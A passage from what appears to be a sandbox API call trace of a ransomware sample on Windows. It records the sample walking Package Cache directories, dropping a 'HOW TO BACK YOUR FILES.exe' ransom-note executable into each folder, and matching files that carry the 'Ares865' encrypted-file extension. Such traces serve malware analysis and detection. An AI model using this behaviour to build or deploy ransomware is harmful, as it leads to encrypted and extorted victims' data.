(lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.080] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.080] GetLastError () returned 0x0 [0090.080] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.080] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.080] CloseHandle (hObject=0x120) returned 1 [0090.080] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.080] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.081] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.081] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.081] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch" [0090.081] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch" [0090.081] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.081] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.081] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.082] GetLastError () returned 0x0 [0090.082] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.082] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.082] CloseHandle (hObject=0x120) returned 1 [0090.082] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.082] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.082] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.082] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.082] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64" [0090.082] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64" [0090.082] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.082] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.083] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.083] GetLastError () returned 0x0 [0090.083] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.083] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.083] CloseHandle (hObject=0x120) returned 1 [0090.084] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.084] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x6302cbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6302cbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.084] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.084] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.084] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460" [0090.089] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460" [0090.089] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.089] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.090] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.090] GetLastError () returned 0x0 [0090.090] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.090] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.091] CloseHandle (hObject=0x120) returned 1 [0090.091] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.091] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.091] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.091] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.091] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.091] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.091] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.092] lstrcpyW (in: lpString1=0x2cce4b6, lpString2="packages" | out: lpString1="packages") returned="packages" [0090.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0090.092] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc8) returned 0x2c8eb8 [0090.092] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0090.092] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0090.092] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.092] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0090.092] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages" [0090.092] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages" [0090.092] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.092] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.093] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.093] GetLastError () returned 0x0 [0090.093] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.093] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.093] CloseHandle (hObject=0x120) returned 1 [0090.093] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.093] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.093] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.093] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.094] lstrcpyW (in: lpString1=0x2cce4c8, lpString2="Patch" | out: lpString1="Patch") returned="Patch" [0090.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0090.094] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd4) returned 0x2c8eb8 [0090.094] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0090.094] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 0 [0090.094] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.094] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0090.094] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch" [0090.094] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch" [0090.094] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.094] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.095] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.095] GetLastError () returned 0x0 [0090.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.095] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.095] CloseHandle (hObject=0x120) returned 1 [0090.095] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.095] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.095] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.095] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.096] lstrcpyW (in: lpString1=0x2cce4d4, lpString2="x64" | out: lpString1="x64") returned="x64" [0090.096] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0090.096] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xdc) returned 0x2f4fc8 [0090.096] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0090.096] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x63183820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63183820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 0 [0090.096] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.096] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0090.096] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64" [0090.096] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64" [0090.096] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.096] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.097] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.097] GetLastError () returned 0x0 [0090.097] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.097] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.097] CloseHandle (hObject=0x120) returned 1 [0090.097] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.097] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x63183820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63183820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.097] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.097] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.097] lstrcpyW (in: lpString1=0x2cce4dc, lpString2="Windows6.1-KB2999226-x64.msu.Ares865" | out: lpString1="Windows6.1-KB2999226-x64.msu.Ares865") returned="Windows6.1-KB2999226-x64.msu.Ares865" [0090.097] lstrlenW (lpString="Windows6.1-KB2999226-x64.msu.Ares865") returned 36 [0090.097] lstrlenW (lpString="Ares865") returned 7 [0090.098] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.098] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d2100, ftCreationTime.dwHighDateTime=0x1d0a100, ftLastAccessTime.dwLowDateTime=0x59d2100, ftLastAccessTime.dwHighDateTime=0x1d0a100, ftLastWriteTime.dwLowDateTime=0x631a9980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xf7440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows6.1-KB2999226-x64.msu.Ares865", cAlternateFileName="WINDOW~1.ARE")) returned 0 [0090.098] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.098] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0090.098] lstrcpynW (in: lpString1=0x2cce400, 